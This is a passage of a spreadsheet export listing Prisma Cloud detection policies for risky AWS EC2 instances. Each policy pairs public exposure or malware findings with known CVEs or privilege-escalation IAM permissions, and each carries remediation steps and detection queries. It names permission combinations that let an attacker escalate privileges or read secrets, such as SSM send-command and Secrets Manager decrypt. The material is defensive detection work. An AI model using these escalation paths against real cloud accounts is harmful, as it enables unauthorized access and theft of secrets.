        <is>
          <t>This policy identifies AWS EC2 instances which are publicly exposed with critical or high vulnerabilities and privilege escalation permission via EC2 Instance Connect permissions.
Publicly exposed vulnerable EC2 instances could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. An Attacker with access to EC2 instance connect permissions can have network access to push ssh keys and ssh to the instance. This could allow an adversary to escalate privileges through the EC2 instance and move laterally to perform unauthorized actions in the cloud account.
This policy checks for the following privilege escalation permissions:
'ec2:DescribeInstances', 'ec2-instance-connect:SendSSHPublicKey', 'ec2-instance-connect:SendSerialConsoleSSHPublicKey'
Immediate attention is required to grant only the least privileges required and remove unwanted permissions assigned to the EC2 instance. Remediate critical and high vulnerabilities, and restrict public exposure reported for the EC2 instances as soon as possible.</t>
        </is>
      </c>
      <c r="X171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19" t="inlineStr"/>
      <c r="Z1719" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)','AWS IAM policy allows Privilege escalation via EC2 Instance Connect permissions') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA1719" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1719" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC1719" t="inlineStr"/>
      <c r="AD1719" t="b">
        <v>1</v>
      </c>
      <c r="AE1719" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1719" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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19" t="inlineStr">
        <is>
          <t>21b38b59-f0a4-4f5c-a010-fb6574354ac0</t>
        </is>
      </c>
      <c r="AI1719" t="inlineStr">
        <is>
          <t>a25ed0a2-ebae-4b98-827f-1bfae6b2906c</t>
        </is>
      </c>
      <c r="AJ1719" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1719" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1720">
      <c r="A1720" t="inlineStr"/>
      <c r="B1720" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1720" s="2" t="inlineStr"/>
      <c r="D1720" t="inlineStr"/>
      <c r="E1720" t="inlineStr"/>
      <c r="F1720" t="inlineStr"/>
      <c r="G1720" t="b">
        <v>1</v>
      </c>
      <c r="H17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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1720" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1720" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable AWS EC2 instance (Samba, CVE-2021-44142)</t>
        </is>
      </c>
      <c r="L1720" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1720" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1720" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1720" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1720" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1720" t="inlineStr"/>
      <c r="R1720" t="inlineStr"/>
      <c r="S1720" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1720" t="b">
        <v>0</v>
      </c>
      <c r="U1720" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1720" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1720" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instance that are publicly exposed and have known exploitable Remote code execution vulnerability (CVE-2021-44142).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Samba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Samba (CVE-2021-44142) vulnerability and public exposure reported for the affected AWS EC2 instance as soon as possible.</t>
        </is>
      </c>
      <c r="X172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CVE-2021-44142
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2021-44142</t>
        </is>
      </c>
      <c r="Y1720" t="inlineStr"/>
      <c r="Z1720" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2021-44142'))</t>
        </is>
      </c>
      <c r="AA1720" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1720" t="inlineStr">
        <is>
          <t>2024-03-05 05:47:18</t>
        </is>
      </c>
      <c r="AC1720" t="inlineStr"/>
      <c r="AD1720" t="b">
        <v>1</v>
      </c>
      <c r="AE1720" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1720" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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0" t="inlineStr">
        <is>
          <t>633d3063-17c1-4413-9fcf-c1dfc4c2680f</t>
        </is>
      </c>
      <c r="AI1720" t="inlineStr">
        <is>
          <t>25843812-6fa8-4803-bbbe-3be5347fe41e</t>
        </is>
      </c>
      <c r="AJ1720" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1720" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1721">
      <c r="A1721" t="inlineStr"/>
      <c r="B1721" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1721" s="2" t="inlineStr"/>
      <c r="D1721" t="inlineStr"/>
      <c r="E1721" t="inlineStr"/>
      <c r="F1721" t="inlineStr"/>
      <c r="G1721" t="b">
        <v>1</v>
      </c>
      <c r="H17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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1721" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1721" t="inlineStr">
        <is>
          <t>Denial of Service (DoS) risk due to publicly exposed and vulnerable AWS EC2 instance [Java Spring Framework, CVE-2021-22119]</t>
        </is>
      </c>
      <c r="L1721" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1721" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1721" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1721" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1721" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1721" t="inlineStr"/>
      <c r="R1721" t="inlineStr"/>
      <c r="S1721" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1721" t="b">
        <v>0</v>
      </c>
      <c r="U1721" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1721" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1721" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed and have a known exploitable denial of service vulnerability [Java Spring Framework, CVE-2021-22119].
Denial of service vulnerability is a security flaw that allows a user to make a machine or network resource unavailable. Exploiting this vulnerability affects the availability of resources. The fact that the AWS EC2 instance is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Java Spring Framework [CVE-2021-22119] vulnerability and public exposure reported for the AWS EC2 instance as soon as possible.</t>
        </is>
      </c>
      <c r="X172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1721" t="inlineStr"/>
      <c r="Z1721" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2021-22119'))</t>
        </is>
      </c>
      <c r="AA1721" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1721" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:04</t>
        </is>
      </c>
      <c r="AC1721" t="inlineStr"/>
      <c r="AD1721" t="b">
        <v>1</v>
      </c>
      <c r="AE1721" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1721" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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1" t="inlineStr">
        <is>
          <t>4d2bc042-5165-4708-8e4f-fc7bbcbe2a05</t>
        </is>
      </c>
      <c r="AI1721" t="inlineStr">
        <is>
          <t>ebbde0f2-0868-417b-910a-b9b8af8e1d1b</t>
        </is>
      </c>
      <c r="AJ1721" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1721" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1722">
      <c r="A1722" t="inlineStr"/>
      <c r="B1722" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1722" s="2" t="inlineStr"/>
      <c r="D1722" t="inlineStr"/>
      <c r="E1722" t="inlineStr"/>
      <c r="F1722" t="inlineStr"/>
      <c r="G1722" t="b">
        <v>1</v>
      </c>
      <c r="H17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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1722" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1722" t="inlineStr">
        <is>
          <t>Privilege Escalation risk due to publicly exposed and vulnerable AWS EC2 instance [Polkit, CVE-2021-4034]</t>
        </is>
      </c>
      <c r="L1722" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1722" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1722" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1722" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1722" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1722" t="inlineStr"/>
      <c r="R1722" t="inlineStr"/>
      <c r="S1722" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1722" t="b">
        <v>0</v>
      </c>
      <c r="U1722" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1722" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1722" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed and have known exploitable privilege escalation vulnerability [CVE-2021-4034].
Privilege escalation vulnerability is a security flaw allowing a user to gain unauthorized elevated system access. Exploiting this vulnerability compromises system security, enabling unauthorized data access or manipulation. The fact that the EC2 instance is publicly exposed makes it an easy target for an attacker to compromise the affected system. 
Immediate attention is required to remediate the Polkit [CVE-2021-4034] vulnerability and public exposure reported for the cloud function as soon as possible.</t>
        </is>
      </c>
      <c r="X172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CVE-2021-4034
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2021-4034</t>
        </is>
      </c>
      <c r="Y1722" t="inlineStr"/>
      <c r="Z1722" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2021-4034'))</t>
        </is>
      </c>
      <c r="AA1722" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1722" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:24</t>
        </is>
      </c>
      <c r="AC1722" t="inlineStr"/>
      <c r="AD1722" t="b">
        <v>1</v>
      </c>
      <c r="AE1722" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1722" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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2" t="inlineStr">
        <is>
          <t>eac8abf0-8910-4444-acc0-a7e405f024ff</t>
        </is>
      </c>
      <c r="AI1722" t="inlineStr">
        <is>
          <t>ed1f6880-1018-40b3-b2e9-86f4aed4ede6</t>
        </is>
      </c>
      <c r="AJ1722" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1722" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1723">
      <c r="A1723" t="inlineStr"/>
      <c r="B1723" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1723" s="2" t="inlineStr"/>
      <c r="D1723" t="inlineStr"/>
      <c r="E1723" t="inlineStr"/>
      <c r="F1723" t="inlineStr"/>
      <c r="G1723" t="b">
        <v>1</v>
      </c>
      <c r="H17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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1723" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1723" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to malware in AWS EC2 instance with risky permissions</t>
        </is>
      </c>
      <c r="L1723" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,MALWARE</t>
        </is>
      </c>
      <c r="M1723" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1723" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1723" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1723" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1723" t="inlineStr"/>
      <c r="R1723" t="inlineStr"/>
      <c r="S1723" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1723" t="b">
        <v>0</v>
      </c>
      <c r="U1723" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1723" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1723" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are affected by malware and are connected with remote systems known for hacking tool activities having permissions that could potentially lead to privilege escalation.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The risky permissions on the instances that are connected with remote systems known for hacking tool activities further help the attackers perform unauthorized actions in the cloud account. 
This policy checks for the following risky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remediate the malware reported for the instances as soon as possible. Review risky permissions, remove unwanted permissions assigned to the EC2 instances, and grant only the least privileges required.</t>
        </is>
      </c>
      <c r="X1723"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23" t="inlineStr"/>
      <c r="Z1723" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name = (('Host contains Malware' or 'Host contains Grayware') and ('AWS EC2 instance with privilege escalation risk permissions'))</t>
        </is>
      </c>
      <c r="AA1723" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1723" t="inlineStr">
        <is>
          <t>2023-12-08 04:25:02</t>
        </is>
      </c>
      <c r="AC1723" t="inlineStr"/>
      <c r="AD1723" t="b">
        <v>1</v>
      </c>
      <c r="AE1723" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1723" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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3" t="inlineStr">
        <is>
          <t>86a3afd6-e24f-4586-9264-005e3c6e1248</t>
        </is>
      </c>
      <c r="AI1723" t="inlineStr">
        <is>
          <t>e1d9e021-084f-488a-a8b0-e55345ff7988</t>
        </is>
      </c>
      <c r="AJ1723" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1723" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1724">
      <c r="A1724" t="inlineStr"/>
      <c r="B1724" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1724" s="2" t="inlineStr"/>
      <c r="D1724" t="inlineStr"/>
      <c r="E1724" t="inlineStr"/>
      <c r="F1724" t="inlineStr"/>
      <c r="G1724" t="b">
        <v>1</v>
      </c>
      <c r="H17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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1724" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1724" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) risk due to publicly exposed and vulnerable AWS EC2 instance [Node.js, CVE-2021-21315]</t>
        </is>
      </c>
      <c r="L1724" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1724" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1724" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1724" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1724" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1724" t="inlineStr"/>
      <c r="R1724" t="inlineStr"/>
      <c r="S1724" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1724" t="b">
        <v>0</v>
      </c>
      <c r="U1724" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1724" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1724" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances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AWS EC2 instance is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Node.js [CVE-2021-21315] vulnerability and public exposure reported for the AWS EC2 instance as soon as possible.</t>
        </is>
      </c>
      <c r="X172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1724" t="inlineStr"/>
      <c r="Z1724" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2021-21315'))</t>
        </is>
      </c>
      <c r="AA1724" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1724" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:56</t>
        </is>
      </c>
      <c r="AC1724" t="inlineStr"/>
      <c r="AD1724" t="b">
        <v>1</v>
      </c>
      <c r="AE1724" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1724" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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4" t="inlineStr">
        <is>
          <t>8b83065e-058b-4cd6-9759-9c55c03b75d9</t>
        </is>
      </c>
      <c r="AI1724" t="inlineStr">
        <is>
          <t>1998bca9-473f-48c2-8307-3cc8a52b2f80</t>
        </is>
      </c>
      <c r="AJ1724" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1724" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1725">
      <c r="A1725" t="inlineStr"/>
      <c r="B1725" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1725" s="2" t="inlineStr"/>
      <c r="D1725" t="inlineStr"/>
      <c r="E1725" t="inlineStr"/>
      <c r="F1725" t="inlineStr"/>
      <c r="G1725" t="b">
        <v>1</v>
      </c>
      <c r="H17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25" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1725" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1725" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to a publicly exposed unprivileged AWS EC2 instance assuming admin privileges</t>
        </is>
      </c>
      <c r="L1725" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1725" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1725" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1725" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1725" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1725" t="inlineStr"/>
      <c r="R1725" t="inlineStr"/>
      <c r="S1725" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1725" t="b">
        <v>0</v>
      </c>
      <c r="U1725" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1725" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1725" t="inlineStr">
        <is>
          <t>This policy identifies unprivileged AWS EC2 instances that are publicly exposed assuming admin privileges.
Publicly exposed EC2 instances could allow malicious actors to get initial access to the instance. AWS EC2 instances assuming admin privileges pose a high security risk due to the extensive permissions and control granted to the administrator. With admin privileges, an individual or entity could potentially make unauthorized changes to critical resources, access sensitive data, and compromise the security of the entire environment.
Immediate attention is required to grant only the least privileges required and remove unwanted role assignments / permissions assigned to the EC2 instance. Restrict public exposure reported for the EC2 instances as soon as possible.</t>
        </is>
      </c>
      <c r="X1725"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[PERMISSION]
In order to remove any administrative permissions and minimize trusted entities which can assume the role, use the following remediation steps:
1. Browse to the privileged role ("Destination") in the AWS Console
2. Select "Trust relationships"-&gt;"Edit trust policy"
3. Modify the role's trust relationship as per requirements
4.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1725" t="inlineStr"/>
      <c r="Z1725" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)','Unprivileged Compute resource can assume a Service Account with admin privileges')</t>
        </is>
      </c>
      <c r="AA1725" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1725" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:27</t>
        </is>
      </c>
      <c r="AC1725" t="inlineStr"/>
      <c r="AD1725" t="b">
        <v>1</v>
      </c>
      <c r="AE1725" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1725" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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25" t="inlineStr">
        <is>
          <t>3ecd6955-bf4e-4559-a54b-ef50ca59a2d8</t>
        </is>
      </c>
      <c r="AI1725" t="inlineStr">
        <is>
          <t>7838887a-383a-448f-80b5-cd0f47dee113</t>
        </is>
      </c>
      <c r="AJ1725" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1725" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1726">
      <c r="A1726" t="inlineStr"/>
      <c r="B1726" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1726" s="2" t="inlineStr"/>
      <c r="D1726" t="inlineStr"/>
      <c r="E1726" t="inlineStr"/>
      <c r="F1726" t="inlineStr"/>
      <c r="G1726" t="b">
        <v>1</v>
      </c>
      <c r="H17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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1726" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1726" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to malware in AWS EC2 instance with SSM sendCommand &amp; SSM session permissions</t>
        </is>
      </c>
      <c r="L1726" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,MALWARE</t>
        </is>
      </c>
      <c r="M1726" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1726" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1726" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1726" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1726" t="inlineStr"/>
      <c r="R1726" t="inlineStr"/>
      <c r="S1726" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1726" t="b">
        <v>0</v>
      </c>
      <c r="U1726" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1726" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1726" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are affected by malware and have risky SSM permissions that could potentially lead to privilege escalation.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The risky privilege escalation SSM permissions on the instance further help the attackers to escalate their privilege and perform unauthorized actions in the cloud account.
This policy checks for the following risky permissions that could potentially lead to privilege escalation:
'ec2:DescribeInstances', 'ssm:StartSession', 'ssm:DescribeSessions', 'ssm:GetConnectionStatus', 'ssm:DescribeInstanceProperties', 'ssm:TerminateSession', 'ssm:ResumeSession', 'ssm:listCommands', 'ssm:listCommandInvocations', 'ssm:sendCommand'
Immediate attention is required to remediate the malware reported for the instances as soon as possible. Review risky permissions, remove unwanted permissions assigned to the EC2 instances, and grant only the least privileges required.</t>
        </is>
      </c>
      <c r="X1726" t="inlineStr">
        <is>
          <t>[MALWARE]
Including files flagged as malware in a host filesystem poses significant security risks. It can lead to system infections, data breaches, and application disruptions. Maintain a secure environment by excluding such files from hosts.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26" t="inlineStr"/>
      <c r="Z1726" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name = (('Host contains Malware' or 'Host contains Grayware') and ('AWS IAM policy allows Privilege escalation via EC2 describe and SSM list and send command permissions' or 'AWS IAM policy allows Privilege escalation via EC2 describe and SSM session permissions'))</t>
        </is>
      </c>
      <c r="AA1726" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1726" t="inlineStr">
        <is>
          <t>2023-12-08 04:25:02</t>
        </is>
      </c>
      <c r="AC1726" t="inlineStr"/>
      <c r="AD1726" t="b">
        <v>1</v>
      </c>
      <c r="AE1726" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1726" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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6" t="inlineStr">
        <is>
          <t>d2f5c2c6-a82e-440c-ab4d-3850a8decb9d</t>
        </is>
      </c>
      <c r="AI1726" t="inlineStr">
        <is>
          <t>3be4ff64-5a6b-42e4-8d63-c59dededb9f3</t>
        </is>
      </c>
      <c r="AJ1726" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1726" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1727">
      <c r="A1727" t="inlineStr"/>
      <c r="B1727" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1727" s="2" t="inlineStr"/>
      <c r="D1727" t="inlineStr"/>
      <c r="E1727" t="inlineStr"/>
      <c r="F1727" t="inlineStr"/>
      <c r="G1727" t="b">
        <v>1</v>
      </c>
      <c r="H17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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1727" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1727" t="inlineStr">
        <is>
          <t>Unauthorized access risk due to a publicly exposed and vulnerable EC2 instance with risky Secrets Manager permissions</t>
        </is>
      </c>
      <c r="L1727" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1727" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1727" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1727" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1727" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1727" t="inlineStr"/>
      <c r="R1727" t="inlineStr"/>
      <c r="S1727" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1727" t="b">
        <v>0</v>
      </c>
      <c r="U1727" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1727" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1727" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed with critical or high vulnerabilities and have risky access and decrypt Secrets Manager Secrets permissions.
A publicly exposed and vulnerable AWS EC2 instance could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. EC2 instances with risky access and decrypt permissions could allow a malicious actor to retrieve sensitive secrets from Secrets Manager and unauthorized decryption of encrypted data through AWS Key Management Service (KMS).
This policy checks for the following risky database management write access permissions:
'secretsmanager:GetSecretValue', 'kms:Decrypt'
Immediate attention is required to grant the least privileges required and remove unwanted risky permissions assigned to the EC2 instance, remediate critical and high vulnerabilities, and restrict public exposure reported for the EC2 instances as soon as possible.</t>
        </is>
      </c>
      <c r="X172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27" t="inlineStr"/>
      <c r="Z1727" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)','AWS IAM policy allows access and decrypt Secrets Manager Secrets permissions') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA1727" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
